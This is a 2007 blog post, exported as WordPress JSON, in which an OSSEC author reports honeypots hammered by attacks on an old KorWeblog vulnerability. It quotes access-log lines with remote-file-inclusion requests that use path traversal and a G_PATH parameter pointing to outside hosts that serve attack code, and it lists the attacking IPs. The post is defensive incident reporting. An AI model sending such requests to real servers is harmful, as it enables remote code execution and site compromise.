{"id":260,"date":"2007-06-27T03:13:00","date_gmt":"2007-06-27T03:13:00","guid":{"rendered":"https:\/\/defragged.org\/ossec\/?p=260"},"modified":"2020-07-03T03:14:13","modified_gmt":"2020-07-03T03:14:13","slug":"hammered-by-web-attacks-korweblog","status":"publish","type":"post","link":"https:\/\/defragged.org\/ossec\/2007\/06\/hammered-by-web-attacks-korweblog\/","title":{"rendered":"Hammered by web attacks (KorWeblog)"},"content":{"rendered":"\n

Some of my web honeypots are being hammered by attacks against KorWeblog<\/a>. If fact, even my real systems are received a lot of these too.. It looks like they are trying to exploit an old vulnerability (from 2005), which sounds odd to me.<\/p>\n\n\n\n

Example of alert from ossec<\/a>:<\/p>\n\n\n\n

OSSEC HIDS Notification.
2007 Jun 27 17:07:30<\/p>

Received From: xx->\/var\/log\/httpd\/xx.access.log
Rule: 31106 fired (level 12) -> \u201cA web attack returned code 200 (success).\u201d
Portion of the log(s):<\/p>

8.10.120.85 \u2013 – [27\/Jun\/2007:17:07:29 -0300] \u201cGET \/install\/index.php?lng=..\/..\/include\/main.inc&G_PATH=http:\/\/nicksom2d.sytes.net\/ex\/echo? HTTP\/1.1\u2033 200 6349 \u201c-\u201d \u201clibwww-perl\/5.805\u2033<\/p><\/blockquote>\n\n\n\n

Just one honeypot (yes, one) in the last few days was \u201cattacked\u201d by the following IPs (25 different):<\/p>\n\n\n\n

189.1.168.118
200.193.146.100
200.219.150.6
202.123.27.136
203.55.214.70
207.150.188.50
207.226.179.98
209.216.205.81
210.188.204.198
211.247.239.10
213.194.149.130
216.7.185.31
217.170.66.240
218.228.196.88
218.239.223.225
221.127.101.45
62.193.237.43
62.75.163.196
65.98.58.2
72.232.219.205
8.10.120.85
83.103.57.13
83.217.84.88
85.125.233.222
89.110.144.202<\/p><\/blockquote>\n\n\n\n

The logs look all the same:<\/p>\n\n\n\n

200.193.146.100 \u2013 – [26\/Jun\/2007:16:37:37 -0300] \u201cGET \/*install\/index.php?lng=..\/..\/include\/main.inc&G_PATH=http:\/\/www.thiaguinho.net\/id.txt? HTTP\/1.1\u2033 200 6351 \u201c-\u201d \u201clibwww-perl\/5.79\u2033
8.10.120.85 \u2013 – [27\/Jun\/2007:17:07:29 -0300] \u201cGET \/install\/index.php?lng=..\/..\/include\/main.inc&G_PATH=http:\/\/nicksom2d.sytes.net\/ex\/echo? HTTP\/1.1\u2033 200 6349 \u201c-\u201d \u201clibwww-perl\/5.805\u2033<\/p><\/blockquote>\n\n\n\n

I posted a few of the sites that were found at the WebAttacks Links<\/a> in the ossec wiki.<\/p>\n","protected":false},"excerpt":{"rendered":"

Some of my web honeypots are being hammered by attacks against KorWeblog. If fact, even my real systems are received a lot of these too.. It looks like they are trying to exploit an old vulnerability (from 2005), which sounds odd to me. Example of alert from ossec: OSSEC HIDS Notification.2007 Jun 27 17:07:30 Received From: xx->\/var\/log\/httpd\/xx.access.logRule: […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[2,3],"tags":[],"_links":{"self":[{"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/posts\/260"}],"collection":[{"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/comments?post=260"}],"version-history":[{"count":1,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/posts\/260\/revisions"}],"predecessor-version":[{"id":261,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/posts\/260\/revisions\/261"}],"wp:attachment":[{"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/media?parent=260"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/categories?post=260"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/tags?post=260"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}